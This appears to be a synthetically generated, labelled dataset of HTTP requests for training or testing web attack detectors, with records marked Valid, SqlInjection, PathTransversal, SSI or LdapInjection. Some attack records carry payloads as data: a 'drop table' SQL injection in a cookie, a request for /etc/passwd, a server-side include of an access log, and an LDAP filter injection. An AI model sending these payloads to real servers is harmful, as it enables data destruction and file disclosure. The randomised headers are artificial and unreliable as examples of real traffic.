Via: FTP/0.4 www.ai3pi.gif:9514, FTP/2.7 159.224.23.94, HTTP/4.9 www.0ehdeenu.jpeg:9477
Transfer-Encoding: haIac2; tseepin=uabwi
Upgrade: zigft/2.5, 9y3l/0.7
Warning: 283 www.hdean.gif "eabmweetutsixy" 
X-Forwarded-For: 112.8.23.251
X-Serial-Number: 15983235
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28400
Start - Id: 35097
class: SqlInjection
GET /emamoeogerf/npwFFCDgk1uYH/b4w5Rm/rmryeithtreettx.swf?q5zURU.binX=inaP%3Cformbetween%5Coe%3Dewo&k1moneleK=aoK0nph-&eey=nCGdrfy&wsesot=wgroup+byle&5ZZCP=83640072&xlRafug=98890&ioathahtdereoth=soescript2eygCutd9&O5DfTOGT2@j=s%7C+o9Deiframey-fromnw9%3Feiga&miExrPdot=621700021&pim5yiHw=s5fr%5Dm%3A%25&o0bsij7xeamocl=5&XBCBXV0=56472 HTTP/1.0
Host: www.aIeohcrojb.de
Connection: close
Accept: video/mpeg;q=0.1, audio/x-wav
Accept-Charset: iso-8859-1, x-mac-chinesetrad;q=0.6
Accept-Encoding: 
Accept-Language: 2-Vsrrne
Cache-Control: no-cache
Cookie: epe1=nru2Ogga;sAhcpna0vuanii=';drop table     ttchestdhi;hteCreF=31856106
Cookie2: $Version="8"
Date: Sat, 24 Nov 07 21:54:31 UTC
ETag: W/"e@.P2A6htGRqYvyHCiv"
Expect: 100-continue
If-Modified-Since: Fri, 15 Feb 08 24:19:50 UTC
If-Unmodified-Since: Wed, 25 Oct 06 13:09:35 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Dec 07 08:26:10 UTC
Max-Forwards: 048
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM aWVsc21uRW1BZVJlNXNGdGEzeGZtcjFoY2NldHVlZW8xZG9NdHVRb3I=
Authorization: Digest qop=auth
Referer: /yreaweea.sh
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 2.5; sa-ad; rv:0.8.6) Gecko/68344421
UA-Disp: 7445,562,16
UA-OS: Windows NT
UA-Pixels: 712x637
Via: 3.3 189.94.249.5, 8.9 www.Rar5we.jpg
Transfer-Encoding: compress
Warning: 935 www.yeac.htm "gBreee8yeh7aryso17t" "Mon, 01 Jan 07 23:21:49 CET"
X-Forwarded-For: 86.4.185.231
X-Serial-Number: 3566639
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35097
Start - Id: 34500
class: Valid
POST /yw7APL1C/autoexecEcM7SV-Pnc/ntfet0leiarl/nSDfkfAg/5qqCsp/apuupANnm/eeIEa.sh? HTTP/1.0
Content-Length: 12
Content-Language: an,1onutd,ulmi
Content-Encoding: identity
Content-Location: http://www.blsnm.it/eive8dyt/aofmsoi/nebsO.php3
Content-MD5: UnNibGlzb2pubm5tYWhJYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Mar 09 18:17:07 CET
Last-Modified: Wed, 03 Jun 09 13:19:58 UTC
Host: 150.131.166.33:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.4, deflate, compress
Accept-Language: *;q=0.6
Cache-Control: max-age=18483
Client-ip: 96.49.197.35
Cookie: fdiilps=nL4;CpvgPFA4D=w8JW.Jb;m-Du7j=itt8alspethshiij;ENAfh=(hxb0;oMgeni=dnw6et;D2r=511122463
Cookie2: $Version="08"
Date: Fri, 26 Jun 09 17:07:07 UTC
ETag: W/"zXkqap1UykJ3qZ_m7Y"
Expect: ndneT1nR=tcnasehS
From: doesa@0psfre.gov
If-Modified-Since: Thu, 29 Jan 09 01:37:39 CET
If-Unmodified-Since: Sun, 16 Oct 05 16:17:35 CET
If-Match: "0keeEj.5cgzsMjxxwv"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: 8bnrqi t6sehpaY=rejt
Authorization: Digest uri=/ecNmIl/ieRdhw8d.gif
Range: 003-49,-300,-23
Referer: http://www.tsasnc0.org/ndduh/e4sh/eevjp/di2l1e/1TaeSsfP.swf
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 0.3; rm-ab; rv:6.9.2) Gecko/63181443
UA-CPU: MIPS
UA-Disp: 3627,6324,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7089x0052
Via: HTTP/3.3 www.areiif.jpg
Transfer-Encoding: compress
Upgrade: rom/3.2, dam9/0.8, 7tem/6.5, z0g/8.9, amnc/6.5
Warning: 120 105.92.89.208:5 "xubtas3ei" "Wed, 09 Apr 08 24:59:15 GMT"
X-Forwarded-For: 63.206.208.126
X-Serial-Number: 16107825761
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

9gfie=645873

End - Id: 34500
Start - Id: 28895
class: Valid
GET /z1Y5.htm?Ylftp0Z1Et7Y=35045 HTTP/1.0
Host: www.zeaay2wadt.biz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1252;q=0.6, euc-cn, windows-1258, iso-2022-jp, koi8
Accept-Encoding: compress;q=0.3, gzip, compress;q=0.1
Accept-Language: *;q=0.3
Cache-Control: min-fresh=967
Client-ip: 28.194.250.228
Cookie: u83usrtr=593924;8t=92;irl=n:avS ;hzeAl=hgieiW;connectWQ5c.l9KwNw=Astding;0iunriocx7=h
Cookie2: $Version="13"
Date: Thu, 23 Nov 06 15:08:04 GMT
ETag: "2DjujeEkOAeoLe7@"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Fri, 19 Feb 10 24:31:27 CET
If-Unmodified-Since: Mon, 19 Apr 04 08:28:36 CET
If-Match: "GWBg8L7Rru6E9VbUlOnb"
If-None-Match: "dgWJ8McAp0y4mx0"
If-Range: *
Max-Forwards: 6
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic Z3JkNmRyb3Q6cmY2NmE=
Range: 2410-,5-
Referer: http://www.ncsut.net/qydhni/Timeer/e5hno/ynjv3we.css
TE: deflate,chunked;q=0.9
Trailer: If-None-Match
User-Agent: Mozilla/9.8 (X11; U; SunOS sun4u 1.1; gh-ct; rv:0.6.6) Gecko/70415467
UA-CPU: MIPS
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 122x5513
Via: oexf/6.2 www.n0in.css, FTP/7.1 www.w9Lmt.css, 9.1 139.212.221.99
Transfer-Encoding: identity
Upgrade: ane5/8.7, tterno/7.9, Xoo/8.9, opmdn/9.8
Warning: 104 www.oaChe2ao.css "si2kaalcoktaehr" "Sun, 05 Aug 07 09:32:59 GMT"
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 926912300576004465
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28895
Start - Id: 15129
class: Valid
GET /3KaE.8DknsJJoUx/B2likeAstylev.exe?Cdelete-beV7c4=44816&tsPlz6i6A=69&O5jeJZ41=aonroe&0utnonef=neudlIudi8nwgceqc&dmEznehyodaayr1=erhttpsE&wsusp4=iN5R&ttonbeGi=systemfttcohaa&t1Pat=ahr+tmp+1waio6tnperlsock_streamt%28e&eHUyGwform=ye%25md&hhsi=%3Aood&cID8RRc8Qlinknetcat=n82gd%409%40Y4k&Ge5heil=y8iZS HTTP/1.0
Host: 74.183.174.110
Connection: close
Accept: audio/x-wav;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.8, deflate, gzip;q=0.0
Accept-Language: oFme-28stmo, ha-t;q=0.5, mkC4s1lh-emhetx;q=0.9
Cache-Control: max-age=82335
Client-ip: 112.71.161.26
Cookie: Ns2XoYDsLZ=6665502
Cookie2: $Version="351"
Date: Sun, 09 Nov 08 15:38:38 UTC
ETag: "C.MS2bhi6Vs@uvu__cz-"
Expect: 100-continue
From: tdYa@cfpn.st
If-Modified-Since: Tue, 10 Mar 09 18:53:19 GMT
If-Unmodified-Since: Mon, 29 Mar 10 09:09:16 GMT
If-Match: *
If-None-Match: "JdVjveNlY1.zNCGC"
If-Range: Sat, 02 Sep 06 16:19:02 GMT
Max-Forwards: 237
MIME-Version: 6.6
Pragma: eioetc='aeyisaq'
Proxy-Authorization: NTLM ZTJhZW5paTc2aTVOM29mYXhyb2V1cWlBWjBzemxsZXN5Mw==
Authorization: Basic cnZvdG86dGU4ZWx0RA==
Range: 8-,8116-1
Referer: /jbco65/d9bsnee/rvmntYO/hSerr.txt
TE: trailers,gzip,gzip;q=0.7
Trailer: Accept-Language
User-Agent: atSra7/6.9.1.4.4
UA-CPU: 68000
UA-Disp: 7020,108,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 572x437
Via: FTP/3.1 211.163.140.137, 6.4 www.rSnl.htm
Transfer-Encoding: compress
Upgrade: qafs/3.4, ntrid/3.1, Ffue/7.1, 5uetew/4.0, pt9exy/2.3
Warning: 492 198.163.135.58 "Xr8olpskba5escfetmfl" "Tue, 05 Jul 05 16:42:14 UTC"
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 0851506973
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15129
Start - Id: 46135
class: PathTransversal
GET /onoR4w6tg/rPkTUGHtMjaA/eatoorheced/CnIMW@rG/KHdas7ti/NHp0a6Uk./VEaireil4/nExIkNr9E@p715Ad.jsp?tmpZSZy4PyZ=oEsdU&ah=bnrj&orino=%5Cg&tk=1sn%7C9tI&rouo7tndits=81&emlKaOmlk=teegie&eabtriEnhstvoc=%2Fetc%2Fpasswd&ndnbiae=laa73uma+ru3eirs+g&bEoie=inu&is7ittUa8tMugv=ld2acteait1ea&aae3eeageagijtE=mEyIvis+dcYf&zen3tpopatettsh=qre2tiaphs2i6uobey&eabszt=9556755&7rrug=n%3EypT&gasce8peahoE6eo=S4otaetT4%7Eirw%3Eeoar2t HTTP/1.1
Host: 139.8.242.76
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: nosntol-2Sia, dhii-xbl;q=0.5, eNtb-zroeo, aM-ets3vovo;q=0.3, da-ar7;q=0.3
Cache-Control: min-fresh=5
Client-ip: 194.70.22.121
Cookie: aY64kT5=A
Cookie2: $Version="5"
Date: Fri, 08 May 09 17:06:00 CET
ETag: W/"GpXBhJEcBz_@Y8t"
Expect: 100-continue
From: r9hecgen@ob8h.it
If-Modified-Since: Sun, 16 Nov 08 02:13:07 GMT
If-Unmodified-Since: Sat, 16 Jan 10 02:35:13 UTC
If-Match: "uKJ0-pMXX2Tr5VWZstpU"
If-None-Match: "gSMREJNl9MM9dFNO"
If-Range: *
Max-Forwards: 04
MIME-Version: 5.3
Pragma: iu=t
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
Authorization: NTLM ZGlpMm9wcGpvZWZsd3Nuc3RpZWxpNXhmb3NFc2F1bmlub3VsaGlicWVn
Referer: /wajm4.aspx
TE: deflate
Trailer: Transfer-Encoding
User-Agent: rsefhirta/3.2
UA-OS: Windows NT
Via: 5.7 www.rboyeeor.html:77
Transfer-Encoding: compress
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 83931
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46135
Start - Id: 39672
class: SSI
GET /wltd9inee2r3boee/guatysosmeeqKa1dsmhi/cstDnvtio6.gif?je4=ctwRsOeoTRtopmcLt&el3r=%3C%21--+++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E HTTP/1.0
Host: 206.170.20.32
Connection: close
Accept: text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=0601
Client-ip: 17.56.25.243
Cookie: tfnanneccoere7=epNh:;iwcyEtpdtt=kihnull@|c;insertrt]at5l/a3n;qeiowt=264287;cb=eh0;7xusr2kpgroup byIB=yjmbXasQn1h;rfenrOr=scLbEguV6ra
Cookie2: $Version="57"
Date: Sun, 22 Feb 04 17:11:16 GMT
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Mon, 14 Dec 09 13:42:17 GMT
If-Unmodified-Since: Sun, 09 May 04 23:21:20 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic Z2NtdGE6aGFucw==
Authorization: Basic dGFyYm46a0NsZXRh
Range: -7190
Referer: /dmtl9/Dqpyl/npraweey/rst5Ep.js
TE: trailers,deflate
Trailer: Upgrade
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 7.8; ee-ed; rv:7.1.0) Gecko/09101159
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8969x195
Via: 2.0 21.233.60.202, FTP/3.7 26.203.213.23
Transfer-Encoding: seeE
Upgrade: t0igo/9.1, p2G5i/3.1, nwl5/5.4, hec/0.3, tQr/0.4
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39672
Start - Id: 8044
class: Valid
POST /tm/eNigr/tdielrcuiszirt0/hXdLp54Ug7o3WBt/p4kDyQ79HaUiframeBw.png? HTTP/1.1
Content-Length: 225
Content-Language: Sci,ni,ee3glm
Content-Encoding: gzip
Content-Location: http://eqos.com/Dtoaw/ydh1C/ocapeanl.css
Content-MD5: dHBUbnR5dGhvSHNlb1RwQg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Dec 05 14:43:12 UTC
Last-Modified: Sat, 13 Jan 07 18:24:44 UTC
Host: 204.158.221.55
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: iso-8859-1;q=0.0, x-mac-icelandic, windows-874;q=0.5, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 245.92.71.70
Cookie: rpmFvJfelikej5=eKGhfbq3Tyuo;6ss5pmhn0Tdatx=3940987;HW1m_Vzcexec=MNe;altofqhnoEdsahe='2wr3ocsamtxru;n5l=0034
Cookie2: $Version="526"
Date: Thu, 17 Dec 09 05:13:32 CET
ETag: W/"Xg0_ImD@4MMNOFhP@FU"
Expect: it1lg=n72awDr;sNtkmor6
From: hEe6lhu@edne.be
If-Modified-Since: Tue, 02 Nov 04 09:55:36 UTC
If-Unmodified-Since: Wed, 14 Feb 07 16:17:59 UTC
If-Match: "xBJtUSSymk6YJGtylTT"
If-None-Match: "a5zaBp4TfjkwtVj"
If-Range: "r@o7zhMm@Im3rCkw"
Max-Forwards: 6
MIME-Version: 9.0
Pragma: llds='sn'
Proxy-Authorization: NTLM dGJ0dHd1b1RvYW1pZmhsOWN5RW13bWRpZWI4YXN1M29v
Authorization: NTLM T3c2ZXl3MWlhcmk0QWJzYWF3b3JpbzBpaGx0OHJya3Roa2FIYmI=
Range: -514,0-
Referer: /srrii/E6nI/OooZ3hWA/rNYsn.tiff
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: vfF8Lr http://www.n1cT.fr
UA-CPU: x86
UA-Disp: 366,284,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 981x443
Via: 5.3 227.255.43.19, HTTP/0.8 www.EareT.html
Transfer-Encoding: iein
Upgrade: qnl/0.2, tw2Ka0/3.0
Warning: 757 69.220.219.157 "niueehhZda" "Mon, 28 Nov 05 14:54:37 GMT"
X-Forwarded-For: 243.241.144.79
X-Serial-Number: 0062136234321129
----: ----------------------------
~~~~~: ~~~~~~~~~~

istzarozneshs=u7ne&hEgrs30ire=erl&k1ylHe=uraIhRe&0abX91=m@&0oeh6uittegdnod=slu&Oairyhteu=amouln16'Z;csa+s)&JVsw=nocies0r&ljeu=it&oaafmrnansr26i=5850460&4ee=3621485670&h03=wf0&FzeewQxtermjCF=roaerdM4y=r&bjP=ddw:r

End - Id: 8044
Start - Id: 6248
class: Valid
POST /mzmA3bHeehsdd0Moeyre/1IlBiddsaec6d4eX9og/aH5TWvPo_nD1/wBHTLEWre/0Ss.htm? HTTP/1.0
Content-Length: 243
Content-Language: tseOnegf,re,wkutew
Content-Encoding: gzip
Content-Location: /eozimgr/htei/xnhiaan/brttnX.jpg
Content-MD5: bGVFYXREdjQ1c2FBZG1yaw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 18:02:37 GMT
Last-Modified: Sun, 08 Jul 07 12:31:37 CET
Host: 132.199.7.221
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 93.144.142.158
Cookie: dstvadohhtSNean=t6f;cecrvEh=eswwwvg;E1ipoO=ezhttpsl0csi ntelib-4likediak;uiolgIfrho2Ec9i=880754;aee=e:qos%bhomeebpafehtmeb;e6inXstw=e
Cookie2: $Version="774"
Date: Sun, 09 Sep 07 22:08:57 GMT
ETag: W/"sHMwsDuZsFOTUCY"
Expect: 100-continue
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Wed, 21 May 08 18:24:27 CET
If-Unmodified-Since: Sat, 21 Oct 06 12:17:12 CET
If-Match: *
If-None-Match: "l7tG2__3IpbQvJ4.GixF"
If-Range: Wed, 07 Oct 09 10:16:52 GMT
Max-Forwards: 4
MIME-Version: 1.5
Pragma: RiiooR='iaERa1ay'
Proxy-Authorization: Digest qop=HktC
Authorization: hdMwl ahIea=khnlet
Range: 3-853722,-06527
Referer: http://ea36.gov/Rsdn/Mp9e/i0d63bdg/nm5ttsme.cgi
TE: gzip;q=0.9
Trailer: If-Unmodified-Since
User-Agent: tneH/4.1.3
UA-CPU: MIPS
UA-Disp: 9466,026,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 601x2459
Via: 0.4 6.70.244.14, 1in/6.8 15.68.178.235, HTTP/4.0 www.aroeart.jpeg
Transfer-Encoding: gzip
Upgrade: uiaa/2.8
Warning: 787 238.51.104.140:78 "gris" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 30818494627249
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

Hrm-gJb=sfusointOxryro8&ier=492&Irbjeeaja=xdkprsebttAdwc9&2ezeeyc7zre9ol=i5nbF&dhl6rit7d=cG9FYgSR@sva&hudCr=nrgpMsmohTmoeiin&Tnmnreae=6iowacmisu&i0btehrheerctlb=tgxotMe:rr6e&lGde= ncopy i f|linklN2ur&enoshi5ibwt=rzh3Dra&deoYjri=31UaDsS9F

End - Id: 6248
Start - Id: 37982
class: LdapInjection
GET /hrsyPfL/hcdhihmaerotoN21zqs/s_MPQp_zwgnQ-Uo./Tzmb@w089@5kl5p/i-bLb-dPpsAoo/nisdotwt/bBe6yQiwshutdown@Po/rhjqWqGvEhvcO/rbC3htewliiiK9eeuoe/6uynzKuxM48N8zo3_wL/trC/8dXKF.pl?mdivfSexecmmochametau@=t+et8xoaoae6&udph8d=8&erdecD=43000719&krhci9nsygo=aevlinka&QwnqJYNZjP=7h&eFvusrS1TjxB7=%29+++%28%7C++++%286oi%3Dwujt*%29&emit6r=4842&xew=eeetr HTTP/1.0
Host: 54.254.106.169
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, cp-932, cp-932;q=0.4, iso-8859-1;q=0.7, iso-2022-jp;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8032
Client-ip: 4.162.83.225
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="556"
Date: Sun, 05 Jun 05 04:05:12 UTC
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 27 Aug 09 11:37:43 GMT
If-Unmodified-Since: Mon, 01 Feb 10 24:51:41 GMT
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: "K8K7mnWMiM.L8t4B"
If-Range: *
Max-Forwards: 5824
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: tiver fveie=lgEt8
Range: 4893-,-7197
Referer: http://Hi3aaj.st/Aatpwno/xeutfdod/emreb.js
TE: trailers
Trailer: Warning
User-Agent: iCEJEVEOtD http://www.icid.net
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8848x2681
Via: 5.9 www.beiaelee.jpeg, 3.1 www.bncrx.html
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 418 32.190.138.182:0897 "sohl3tsaeiaSnu5pEd1i" "Tue, 01 Jun 04 21:35:47 UTC"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37982
Start - Id: 1236
class: Valid
GET /3.aXmvEkGb4t714t/sfcz92YAM/tDsIJr1/indnzeO/0Aoguc3qEs6sdze9s/2elxexis/haanh7npe9sgsHs/Gorm7documentscript5eS/jmAW9wUq/e1s8q.il.3I-gqRX-z-g/be1ie/eUQq37XmWxiunDz.php3?a7e=s+ehh&Rswuyl6hr=t&tsi=81&sdnhhmaQrzea=egiItl6ARtp&8weme=cxkw4&EBet1tdteca=y7%3E&wob=025040&bueei=access_logwhere+er&dt8hta=ru0bKpJNNd&rtsxhaeA33ndt=ncatemi&oya6leAbTal4e=lc6QGknj-SM&dmEFXqmORK6k=oh%26%5Berdean6Nne%24&0itnaleOshrl=on+ttfaejiiek&6f0smunhOltal=sym_t7-jF&hAE=wlnredisethgmon HTTP/1.1
Host: www.htoeas.st:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.3
Accept-Language: heaapteu-iactryo, iuespahb-dftAT
Cache-Control: max-age=6927
Client-ip: 84.83.204.254
Cookie: sq7eyH9=pfuyutst;fT=t mq
Cookie2: $Version="955"
Date: Sat, 26 Jan 08 06:59:46 UTC
ETag: "rMdLeei2EugdD8@C0K"
Expect: 100-continue
From: rrss18n@ElE01poue.cz
If-Modified-Since: Mon, 04 May 09 01:31:15 UTC
If-Unmodified-Since: Mon, 02 Apr 07 18:33:00 CET
If-Match: "edr1tf2TvoVnYaHFq2"
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 6.8
Pragma: na9ibaS=wbaSaet
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: lgitxu ezaue=wnxda9
Range: -709
Referer: http://www.ennweihu.ch/ueue/tpbb/o9resyt/rdoU.wmn
TE: chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: rdoneems8/3.3.4
UA-CPU: PowerPC
UA-Disp: 092,1496,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6040x9780
Via: 6.9 www.drer.tiff:58764, FTP/3.7 www.rhrstb.shtml, 1.1 95.105.254.37
Transfer-Encoding: deflate
Upgrade: coiqe/9.7, 2su/5.0, e5rlaa/0.2
Warning: 355 www.oitdunti.shtml "nysuba" 
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 326327
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1236
Start - Id: 29739
class: Valid
GET /an1uOnh5uab/m7m_VY8wHXvvt/ei3iPj1vxr3ok/etDauNKbYSGTfi7F/5axtg3s/ewGI9yScNP.-jR.jNn2/tirSldoo4mmhrii4jhha/hA-/sKPALSLH6Khrx4LU_t/shse/f2eYraftEazi.js?eht8s=rtirnckehh3dm3h&Pio5b=9%40DoS4Ni HTTP/1.1
Host: 218.130.237.185
Connection: close
Accept: audio/x-wav;q=0.1, image/*, audio/basic
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.3
Accept-Language: eltbotSy-ewj2;q=0.5, s-Qmeb6, ls-onind
Cache-Control: max-age=62
Client-ip: 13.161.85.224
Cookie: FehTd4ewaymc=ordImg79lmet
Cookie2: $Version="3"
Date: Mon, 31 Jan 05 14:06:35 GMT
ETag: "XL@wdCoPY8-Rem3gz"
Expect: chxFad
From: nrmoch5@tnieiSbE.com
If-Modified-Since: Sat, 22 Aug 09 13:39:04 UTC
If-Unmodified-Since: Tue, 20 Dec 05 10:27:18 GMT
If-Match: *
If-None-Match: "QTBhlahbx17r_0y6"
If-Range: Tue, 22 Nov 05 20:21:51 CET
Max-Forwards: 119
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: ronlIe iihoIE=hrOros
Range: -6
Referer: /enb1t/ReM4rntc.jsp
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 7.5; nh-De; rv:8.6.2) Gecko/65920817
UA-CPU: MIPS
UA-Disp: 8627,341,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1488x053
Via: FTP/1.3 www.alsaId.js:60294, dCoone/1.7 231.224.43.222:7936, 2.7 www.ahEt.gif
Transfer-Encoding: gzip
Upgrade: etort/8.1, nec/0.0, otezh/8.2, etwlre/8.4
Warning: 115 www.s3ub.html "rhndhdihiimuIsehs" 
X-Forwarded-For: 234.217.103.7
X-Serial-Number: 23055692041391368156
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29739
Start - Id: 6213
class: Valid
PUT /mhunaiR5gatrreeb/8Mx7bK@sq.htm? HTTP/1.1
Content-Length: 239
Content-Language: ne99rq,used4bm,a
Content-Encoding: gzip
Content-Location: http://wtsn.it/nctf/irn6sca/aeeoa/ecxshed.asp
Content-MD5: NWNkb3NPdGhhZ2hhb2NkYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 19:15:24 CET
Last-Modified: Thu, 11 Jun 09 08:31:47 UTC
Host: 91.227.40.101
Connection: close
Accept: image/*;q=0.9, video/mpeg
Accept-Charset: iso-8859-6, windows-1251;q=0.8, isiri-3342;q=0.4, hz-gb-2312;q=0.3, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: mai-oor;q=0.5
Cache-Control: no-store
Client-ip: 225.75.47.14
Cookie: egoAas0aorr=@ezibh;982dgoQ9onnd=3024
Cookie2: $Version="4"
Date: Fri, 17 Apr 09 01:12:59 UTC
ETag: W/"vrmFbeO_tjP@gxn0eL"
Expect: 100-continue
From: ooIos@tieeEwsrcr.de
If-Modified-Since: Tue, 12 Oct 04 16:41:52 CET
If-Unmodified-Since: Thu, 15 May 08 14:23:36 CET
If-Match: *
If-None-Match: *
If-Range: "Af7g8uOMEEOMYEEw1Q_"
Max-Forwards: 891
MIME-Version: 1.5
Pragma: sNltsA='e'
Proxy-Authorization: Basic cnJlZWVyYXk6eDNuYnNlZW8=
Authorization: EIEd eOnvph=0yuacswt
Range: 08944-,040-34609
Referer: http://www.htgA.org/te2hte.jpeg
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.1 (Machintosh; U; Mac OS X 6.2; ij-e0; rv:8.7.9) Gecko/49902969
UA-CPU: Sparc
UA-Disp: 5852,332,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 478x1113
Via: HTTP/8.2 www.tn5i.png
Transfer-Encoding: ar3s
Upgrade: hearu/8.5
Warning: 555 94.168.0.143 "gwzateahhss4B" 
X-Forwarded-For: 108.165.196.92
X-Serial-Number: 3711226
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

otLd=fst&nnobijlauhita= at&sir=8enbi:goa2&iovexwjpjP8us=dGNnh&ea9rieh5Hd=odhak&lHthrdlcef=9112938&hOObPF=erlsmmiam5e&ednirjbctg2z=gB@HSwbLGS&9Gphp2Ge_=coslftcf7d8rl5u64&nNvanthtsds=lotzidfoGe6dramqgg&qMtaryerurc=611&iu-Z=noRi oe? t3s

End - Id: 6213
Start - Id: 15833
class: Valid
GET /6mYisrai.aspx?wrartwiotejDe=%2BimformNbdcopyDll9%40e&tqc=scl&oc=eofiv&ty9es=e.IWtcku&lsc2pnisreNs=90326319&ecnrtva=492799440&sX=5t0nY4uece&mag2csuaNae=2521447420&nsptndf=lttsr6nylr6replacer&1yEeeteIer=9&sItnvEaR=dstseiueahP4oJla HTTP/1.0
Host: 70.227.245.118
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987, utf-7;q=0.4, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 52.196.223.138
Cookie: uojm=24;ws4lu6yl0noEmig=ss ojaRnunm;bgmfdiiTaffn=dh4;loo=yboot.iniueRltytd
Cookie2: $Version="4"
Date: Sat, 09 Jul 05 02:40:38 GMT
ETag: "wcGSmyieuY9S4sQ-"
Expect: 100-continue
From: ueo4hmt0@eibOany.com
If-Modified-Since: Mon, 22 Jun 09 04:37:23 CET
If-Unmodified-Since: Sat, 07 Aug 04 13:23:45 GMT
